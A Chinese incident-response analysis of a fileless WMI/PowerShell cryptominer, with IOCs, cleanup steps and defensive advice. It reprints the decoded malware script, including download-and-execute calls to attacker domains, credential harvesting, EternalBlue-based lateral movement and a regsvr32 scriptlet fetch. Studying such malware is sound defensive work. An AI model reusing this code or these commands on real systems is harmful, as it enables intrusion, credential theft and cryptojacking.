一、情況概述
1.1 情況拓撲
由於運維過程中可能存在違規操作、過失操作或者防護能力不足導致被惡意操作使得主機遭受挖礦程序的侵害,該挖礦程序會下載惡意程序至WMI中,實現無文件挖礦和內網滲透,並下載DDOS攻擊程序和通過任務計劃每隔20分鐘自動生成版本校驗惡意程序。
1.2 情況簡介
2019年4月4日收到用戶告警,內網主機存在CPU過高現象,同時網絡異常監測預警平臺告警內網主機有主動連接礦池行爲。
1.3 分析思路
挖礦程序如要體現出長久穩定的產出貨幣價值,其基礎功能實現、長期運行、自我隱藏和自我傳播的基本特性必不可少。遂根據惡意人員的攻擊基本意圖進行分析:
1.檢查挖礦運行過程;
2.檢查其自我傳播的方式方法;
3.檢查其如何長期運行;
4.檢查其如何滲透至操作系統中;
嘗試通過分析以上過程,從而閉環各個惡意環節的攻擊流程。
二、主機挖礦行爲分析處置
2.1 現狀描述
該主機CPU使用率75%:Powershell.exe佔用CPU較高,對其進行檢查。
2.2 父子進程對應表
wmic process得到的相關進程名、父進程、子進程經梳理後對應表如下所示:
Caption | ParentProcessId | ProcessId |
---|---|---|
wininit.exe | 348 | 388 |
services.exe | 388 | 504 |
svchost.exe | 504 | 624 |
WmiPrvSE.exe | 624 | 5148 |
powershell.exe | 5148 | 3964 |
powershell.exe | 3964 | 3180 |
各程序CommandLine詳見後續。
2.3 wininit.exe
CommandLine:wininit.exe
Windows啓動應用程序。用於啓動services.exe(服務控制管理器)、lsass.exe(本地安全授權)、lsm.exe(本地會話管理器)。
2.4 services.exe
CommandLine:C:\Windows\system32\services.exe
Windows服務管理應用程序。
2.5 svchost.exe
CommandLine:C:\Windows\system32\svchost.exe-k DcomLaunch
DCOMLAUNCH服務可啓動COM和DCOM服務器,以響應對象激活請求。
2.6 WmiPrvSE.exe
CommandLine:C:\Windows\system32\wbem\wmiprvse.exe
wmiprvse.exe是微軟Windows操作系統的一部分,用於通過WinMgmt.exe程序處理WMI操作。
2.7 powershell.exe(PID 3964)
CommandLine:powershell.exe-NoP -NonI -W Hidden -E
$ p i n   =   n e w - o b j e c t   s y s t e m . n e t . n e t w o r k i n f o r m a t i o n . p i n g  
 $ s e = @ ( ( ' u p d a t e . 7 h 4 u k . c o m ' ) , ( ' i n f o . 7 h 4 u k . c o m ' ) , ( ' 1 1 1 . 9 0 . 1 4 5 . 5 2 ' ) , ( ' 1 8 5 . 2 3 4 . 2 1 7 . 1 3 9 ' ) )  
 $ a v g s   =   @ ( )  
 $ n i c   =   ' u p d a t e . 7 h 4 u k . c o m '  
 f o r ( $ i = 0 ; $ i   - l e   3 ; $ i + + ) {  
 	 $ s u m   =   0  
 	 $ c o u n t   =   0  
 	 f o r ( $ j = 1 ; $ j   - l e   4 ; $ j + + ) {  
 	 	 $ t m p   =   ( $ p i n . s e n d ( $ s e [ $ i ] ) ) . R o u n d t r i p T i m e  
 	 	 i f   ( $ t m p   - n e   0 ) {  
 	 	 	 	 $ c o u n t   + =   1  
 	 	 }  
 	 	 $ s u m   + =   $ t m p  
 	 }  
 	 i f   ( $ c o u n t   - n e   0 ) {  
 	 	 	 $ a v g s   + =   $ s u m / $ c o u n t  
 	 } e l s e {  
 	 	 	 $ a v g s   + =   0  
 	 }  
 	 i f   ( $ i   - e q   0 ) {  
 	 	 i f   ( ( $ a v g s [ 0 ]   - l e   3 0 0 )   - a n d   ( $ a v g s [ 0 ]   - n e   0 ) ) {  
 	 	 	 $ n i c   =   $ s e [ 0 ]  
 	 	 	 b r e a k  
 	 	 }  
 	 }  
 	 i f   ( $ i   - e q   1 ) {  
 	 	 i f   ( $ a v g s [ 1 ]   - n e   0 ) {  
 	 	 	 i f   ( ( $ a v g s [ 0 ]   - l e   $ a v g s [ 1 ] )   - a n d   ( $ a v g s [ 0 ]   - n e   0 ) ) {  
 	 	 	 	 $ n i c   =   $ s e [ 0 ]  
 	 	 	 	 b r e a k  
 	 	 	 } e l s e {  
 	 	 	 	 $ n i c   =   $ s e [ 1 ]  
 	 	 	 	 b r e a k  
 	 	 	 }  
 	 	 }  
 	 }  
 	 i f   ( $ i   - e q   2 ) {  
 	 	 i f   ( ( $ a v g s [ 2 ]   - l e   3 0 0 )   - a n d   ( $ a v g s [ 2 ]   - n e   0 ) ) {  
 	 	 	 $ n i c   =   $ s e [ 2 ]  
 	 	 	 b r e a k  
 	 	 }  
 	 }  
 	 i f   ( $ i   - e q   3 ) {  
 	 	 i f   ( $ a v g s [ 3 ]   - n e   0 ) {  
 	 	 	 i f   ( ( $ a v g s [ 2 ]   - l e   $ a v g s [ 3 ] )   - a n d   ( $ a v g s [ 2 ]   - n e   0 ) ) {  
 	 	 	 	 $ n i c   =   $ s e [ 2 ]  
 	 	 	 	 b r e a k  
 	 	 	 } e l s e {  
 	 	 	 	 $ n i c   =   $ s e [ 3 ]  
 	 	 	 	 b r e a k  
 	 	 	 }  
 	 	 }  
 	 }  
 }  
 $ n i c = $ n i c + ( ' : ' + ' 4 4 3 ' )  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )  
 i f ( $ v e r   - n e   $ n u l l ) {  
         $ v e r _ t m p = ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e  
         i f ( $ v e r   - n e   $ v e r _ t m p ) {  
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / a n t i v i r u s . p s 1 " )  
                 r e t u r n  
         }  
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' W i n d o w s   E v e n t s ' }   | R e m o v e - W m i O b j e c t  
  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p  
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s   - c o n t a i n s   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 3 3 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 R u n D D O S   " c o h e r n e c e . e x e "  
 K i l l B o t ( ' S y s t e m _ A n t i _ V i r u s _ C o r e ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " ) )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {  
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
         $ v b s . r u n ( $ c m d m o n , 0 )  
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e  
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
 i f   ( ( $ a   - S p l i t   "   " ) [ 2 ] . l e n g t h   - n e   3 2 )  
 {  
         ( $ a   - S p l i t   "   " ) [ 2 ]   |   O u t - F i l e   - E n c o d i n g   a s c i i   " $ e n v : t e m p \ a 2 5 h Y 2 t l c m V k . t x t "  
 }  
  
 $ N e t w o r k s   =   [ S y s t e m . N e t . D N S ] : : G e t H o s t B y N a m e ( $ n u l l ) . A d d r e s s L i s t  
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e  
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )  
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )  
 {  
  
         $ I P A d d r e s s     =   $ N e t w o r k . I P A d d r e s s T o S t r i n g  
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }  
         $ S u b n e t M a s k     =   ' 2 5 5 . 2 5 5 . 2 5 5 . 0 '  
         $ i p s _ c = G e t - n e t w o r k r a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
         $ i p s _ b = G e t - I p I n B   $ I P A d d r e s s  
         $ i p s = $ i p s _ c + $ i p s _ b  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p  
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {  
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }  
 	 	 	 	 i f   ( ( T e s t - P o r t   $ i p )   - n e   $ f a l s e   - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )  
                 {  
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )  
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p )  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }  
  
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : S y s t e m _ A n t i _ V i r u s _ C o r e ' )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) 
powershell.exe是一種命令行外殼程序和腳本環境。參數簡介如下所示:
序號 | 參數 | 簡介 |
---|---|---|
1 | -NoP | 不加載Windows PowerShell配置文件 |
2 | -NonI | 命令行運行後不和用戶進行交互 |
3 | -W Hidden | 將命令行運行窗口隱藏 |
4 | -E | 接受base-64編碼字符串版本的命令 |
個人不會代碼,所以對上述base64字符串進行解碼並添加代碼塊簡意是連蒙帶猜的,主要表達其中有部分內容將下一步工作指向WMI,如上所述在應急過程中進行是最好的,我當時是根據關鍵字查找大牛已經寫過的材料進行下一步工作:
$pin = new-object system.net.networkinformation.ping
$se=@(('update.7h4uk.com'),('info.7h4uk.com'),('111.90.145.52'),('185.234.217.139'))
$avgs = @()
$nic = 'update.7h4uk.com'
for($i=0;$i -le 3;$i++){
$sum = 0
$count = 0
//判斷服務端是否在線和延時情況以連接對應的域名或IP
for($j=1;$j -le 4;$j++){
$tmp =($pin.send($se[$i])).RoundtripTime
if ($tmp -ne 0){
$count += 1
}
$sum += $tmp
}
if ($count -ne 0){
$avgs += $sum/$count
}else{
$avgs += 0
}
if ($i -eq 0){
if (($avgs[0] -le 300) -and($avgs[0] -ne 0)){
$nic = $se[0]
break
}
}
if ($i -eq 1){
if ($avgs[1] -ne 0){
if (($avgs[0] -le$avgs[1]) -and ($avgs[0] -ne 0)){
$nic = $se[0]
break
}else{
$nic = $se[1]
break
}
}
}
if ($i -eq 2){
if (($avgs[2] -le 300) -and($avgs[2] -ne 0)){
$nic = $se[2]
break
}
}
if ($i -eq 3){
if ($avgs[3] -ne 0){
if (($avgs[2] -le$avgs[3]) -and ($avgs[2] -ne 0)){
$nic = $se[2]
break
}else{
$nic = $se[3]
break
}
}
}
}
//如果服務端版本不等於本地端版本,則下載服務端的antivirus.ps1
$nic=$nic+(':'+'443')
$ver=(New-ObjectNet.WebClient).DownloadString("http://$nic/ver.txt").Trim()
if($ver -ne $null){
$ver_tmp=([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ver'].Value
if($ver -ne $ver_tmp){
IEX (New-ObjectNet.WebClient).DownloadString("http://$nic/antivirus.ps1")
return
}
}
//獲取開機時間並進行定義
$stime=[Environment]::TickCount
//執行WmiClass裏root\default:System_Anti_Virus_Core-"funs"屬性內容,釋放WMI exec和永恆之藍攻擊代碼
$funs = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['funs'].Value
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
iex $defun
//在wmi對象裏查找root\subscription空間,定位windows系統日誌,刪除
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription |Where-Object {$_.filter -notmatch 'Windows Events'} |Remove-WmiObject
//按cpu大小遞減方式逐個獲取powershell.exe進程ID
[array]$psids= get-process -name powershell |sort cpu -Descending|ForEach-Object {$_.id}
$tcpconn = netstat -anop tcp
$exist=$False
//判斷本機是否在給自己挖礦,例如已運行的powershell.exe和外部地址的80或14444或14433端口是否有已建立的TCP連接,否則循環
if ($psids -ne $null )
{
foreach ($t in $tcpconn)
{
$line =$t.split(' ')|?{$_}
if ($line -eq $null)
{continue}
if (($psids -contains$line[-1]) -and $t.contains("ESTABLISHED") -and($t.contains(":80 ") -or $t.contains(":14444") -or$t.contains(":14433")) )
{
$exist=$true
break
}
}
}
!!!
RunDDOS "cohernece.exe"
KillBot('System_Anti_Virus_Core')
//殺掉其他挖礦程序,例如與外部端口3333,55555,7777已建立連接的挖礦程序
foreach ($t in $tcpconn)
{
$line =$t.split(' ')|?{$_}
if (!($line -is[array])){continue}
if(($line[-3].contains(":3333") -or$line[-3].contains(":5555") -or$line[-3].contains(":7777")) -and$t.contains("ESTABLISHED"))
{
$evid=$line[-1]
Get-Process -id $evid| stop-process -force
}
}
//如果沒有挖礦,例如本機沒有連接外部14444或14433端口和已運行powershell.exe小於8個,執行WmiClass的root\default:System_Anti_Virus_Core-"mon"和"funs"屬性內容進行挖礦和內網滲透。
if (!$exist -and ($psids.count -le 8))
{
$cmdmon="powershell -NoP-NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;`$funs= ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value;iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock-ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
$vbs = New-Object -ComObjectWScript.Shell
$vbs.run($cmdmon,0)
}
//取WmiClass的root\default:System_Anti_Virus_Core-"mimi"屬性內容賦給$mimi,並檢查長度是否32位,如果不是將該內容輸出至temp\a25hY2tlcmVk.txt文件
$NTLM=$False
$mimi = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['mimi'].Value
$a, $NTLM= Get-creds $mimi $mimi
if (($a -Split " ")[2].length -ne 32)
{
($a -Split " ")[2] |Out-File -Encoding ascii "$env:temp\a25hY2tlcmVk.txt"
}
$Networks = [System.Net.DNS]::GetHostByName($null).AddressList
//將"ipsu"屬性內容賦值給$ipsu
$ipsu = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ipsu'].Value
//將"i17"屬性內容賦值給$i17
$i17 = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['i17'].Value
//將"sc"屬性內容賦值給$scba
$scba= ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['sc'].Value
//將"sc"屬性內容轉換成8位無符號整數數組
[byte[]]$sc=[System.Convert]::FromBase64String($scba)
foreach ($Network in $Networks)
{
//格式化IP地址
$IPAddress = $Network.IPAddressToString
//判斷自身IP地址是否爲空
if ($IPAddress -match'^169.254'){continue}
$SubnetMask = '255.255.255.0'
//將Get-networkrange到的IP和掩碼賦值給$ips_c
$ips_c=Get-networkrange$IPAddress $SubnetMask
//將Get-IpInB到的IP賦值給$ips_b
$ips_b=Get-IpInB $IPAddress
$ips=$ips_c+$ips_b
$tcpconn = netstat -anop tcp
//取tcp連接是已建立狀態且不包含127.0.0.1,並不是自己連自己,最後類似入棧行爲
foreach ($t in $tcpconn)
{
$line =$t.split(' ')|?{$_}
if (!($line -is[array])){continue}
if ($line.count -le4){continue}
//分割外部地址並只取IP
$i=$line[-3].split(':')[0]
//如果tcp連接是已建立狀態且不包含127.0.0.1,並不是自己連自己則繼續
if ( ($line[-2] -eq'ESTABLISHED') -and ($i -ne '127.0.0.1')-and ($ips -notcontains $i))
{
$ips+=$i
}
}
//如果開機時間小於1.5個小時則繼續
if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}
foreach ($ip in $ips)
{
if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}
if ($ip -eq$IPAddress){continue}
//MS17-010永恆之藍攻擊
if ((Test-Port $ip)-ne $false -and $ipsu -notcontains $ip)
{
$re=0
if ($a.count -ne 0)
{$re = test-ip -ip $ip-creds $a -nic $nic -ntlm $NTLM }
if ($re -eq 1){$ipsu=$ipsu +" "+$ip}
else
{
$vul=[PingCastle.Scanners.m17sc]::Scan($ip)
if ($vul -and $i17-notcontains $ip)
{
$res=eb7 $ip $sc
if (!($res -eq$true))
{eb8 $ip $sc}
$i17 = $i17 +" "+$ip
}
}
}
}
}
//賦值給staticClass
$StaticClass=New-ObjectManagement.ManagementClass('root\default:System_Anti_Virus_Core')
//wmiexec攻擊成功的失陷主機IP賦值給StaticClass的ipsu
$StaticClass.SetPropertyValue('ipsu' ,$ipsu)
//推送更新
$StaticClass.Put()
//永恆之藍攻擊成功將失陷主機IP賦值給StaticClass的i17
$StaticClass.SetPropertyValue('i17' ,$i17)
//推送更新
$StaticClass.Put()
2.8 powershell.exe(PID 3180)
內容和上一個powershell載荷重複,詳見目錄2.7。
2.9 WmiClass檢查
根據分析PID 3964內存中的內容,發現各種惡意內容都儲存在WMI root\default:System_Anti_Virus_Core中,如需要調用,也是直接加載到內存中執行,即實現本地無文件挖礦和內網滲透。
Windows自帶wbemtest.exe工具可以管理Windows Management Instrumentation。下拉框至最底部,發現PID 3964內存數據中存在的各個屬性。
2.9.1 ver屬性(由於不會代碼,以下部分內容從數據包層面進行功能驗證)
查詢DNS記錄,並ping測試服務端在線情況。
數據包顯示第一個動作即是驗證版本,如版本不一致即下載antivirus.ps1。
更新完成之後服務端和本地端版本一致。
服務端版本
本地版本
2.9.2 funs屬性
對funs內容進行解碼並上傳雲端進行殺毒。
2.9.3 ipsu/i17/mimi/sc屬性
ipsu和i17由於wmiexec和MS17-010沒有攻擊成功所以屬性沒有賦值。
mimi和sc由於技術有限,未繼續進行分析。
2.9.4 mon屬性
技術有限,未在代碼層面進行分析,PID 3180會釋放mon內容進行挖礦行爲。
2.9.5 內網滲透
根據PID 3964和PID 3180內存中的數據,分析兩個程序都會釋放funs內容以進行內網滲透。
從ARP層面判斷存活主機:
從TCP三次握手機制判斷目標範圍內的445端口是否開啓:
2.10 antivirus.ps1檢查
由於PID 3964 get該文件並加載到內存後沒有存儲行爲,且利用瀏覽器使用相同的請求頭部也無法下載該文件,導致無法繼續分析(後來發現在命令行中運行然後重定向到文件 中即可對其進行分析)。根據該進程判斷該文件至少包括修改WmiClass、下載cohernece.exe等惡意程序的功能。
2.11 cohernece.exe檢查
該文件2019年1月12日1:30生成。
同目錄下還存在java-log-9527.log,經查閱資料,該文件是cohernece.exe的攻擊載荷。
2.12 關聯檢查
根據名稱進行搜索。發現多個目錄下存在該文件。如下圖紅框所示:
根據該文件生成時間進行搜索,同一時間在極其隱蔽的目錄下:
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5
每隔20分鐘就會自動生成一個htm文件。
對其進行解碼,如下圖所示,按名稱理解主要作用於檢查版本或本地/雲端版本不一致時進行更新。
下載內容如下簡示:
由於其生成時間固定,查詢到任務計劃時發現惡意定時任務:
兩個任務計劃定時操作:
/u /s /i:http://update.7h4uk.com/antivirus.php scrobj.dll
如上鍊接測試無法下載,80替換443後可以下載。
2.13 Ioc
2.13.1 url
update.7h4uk.com
info.7h4uk.com
f4keu.7h4uk.com
xmr-eu1.nanopool.org
2.13.2 ip
185.234.217.139
185.234.217.111
111.90.145.52
151.80.144.25
51.255.34.118
51.15.65.182
164.132.109.110
213.32.29.143
51.15.54.102
51.15.78.68
5.196.13.29
217.182.169.148
5.196.23.240
2.13.3 md5
cohernece.exe 4fe2de6fbb278e56c23e90432f21f6c8
9527.log c2e31d4b8d6f9169d4557587b9d595ec
三、應急處置
根據現場情況經用戶溝通確認,通過內網主機進行以下工作完成了對惡意程序的清除:
1.任務計劃刪除定時任務;
2.按順序kill PID 3964、3180和cohernece.exe;
3.已在WMI中將root\default:System_Anti_Virus_Core的funs、i17、ipsu、mimi、mon、sc、ver屬性刪除;
4.已刪除cohernece.exe和antivirus*.htm。
四、基礎防護能力檢查
4.1 防火牆和MS17010
在本地未安裝MS17010相關補丁的情況下對外開放了445端口,且無第三方殺軟或應用層防火牆,本地網絡層防火牆未啓用,無法針對入棧訪問本地高危端口行爲進行訪問控制。
4.2 Tomcat日誌
Tomcat訪問日誌功能未啓用。
五、分析結論和處理建議
5.1 分析結論
本次內網主機CPU使用率過高經檢查是因爲存在挖礦行爲導致,由於tomcat未啓用訪問日誌記錄功能,未在WEB層面進行攻擊溯源。但根據目錄4.1的分析,完全可以通過目錄2中的惡意程序對內網防護不到位的主機實現自動化內網滲透。
5.2 處理建議
爲減少被惡意行爲取得管理權限後進行勒索或挖礦等發生安全事件的可能性,建議至少包括但不限於:
1.加強准入控制,訪問應用系統建議必須經過多層應用防護;
2.內網管理服務器建議必須經過堡壘機管控和審計,外網管理服務器建議必須通過VPN加密進入內網後再通過堡壘機進行管控和審計;
3.加強準出控制,建議對互聯網或對外提供服務的應用系統,在互聯網出口只做端口映射或雙向地址置換,如無必要,建議禁止互聯網出口代理應用系統的IP出互聯網;
4.應用系統建議經過代碼審計和滲透測試後再對互聯網或對外提供服務;
5.建議不要因爲是測試服務器而降低其安全標準,基於木桶原理,以防測試服務器發生安全事件被獲取權限從而可以橫向滲透內網,因此再次強調業務系統服務器如無必要,禁止主動訪問互聯網,以防獲取管理權限後反彈管理權限至互聯網;
6.辦公終端需預防U盤釣魚或交叉感染惡意程序,儘量不要打開來歷不明的文檔、程序、郵件中的附件,防止社工釣魚。
*本文原創作者:竹林再遇北極熊,本文屬於FreeBuf原創獎勵計劃,未經許可禁止轉載
竹林再遇北極熊 1 篇文章 等級: 1級
|
|
已有 10 條評論
-
123 2019-07-05 回覆 1樓
直接把winmgmt服務關了完事
亮了(1)
-
powerghost,這個很久之前就有相關文章了
亮了(0)
-
Meloncn 2019-07-06 回覆 3樓
最近我們的集羣中也發現了這個東西
亮了(0)
-
最近我們這邊集羣中也發現了這個東西,會掃描你的內網連接其他主機445端口,還會進行密碼爆破。(山東濰坊)
亮了(0)
-
一個摸索安全的人 2019-07-08 回覆 5樓
這個我們在甲方環境也發現了問題,主要是當時發現了定時任務,所以當時全局做了powershell的進程控制,然後再把計劃任務刪除掉,kill掉作者所述的這幾個進程,所以看到作者的覆盤讓我加深了印象,謝謝!
亮了(0)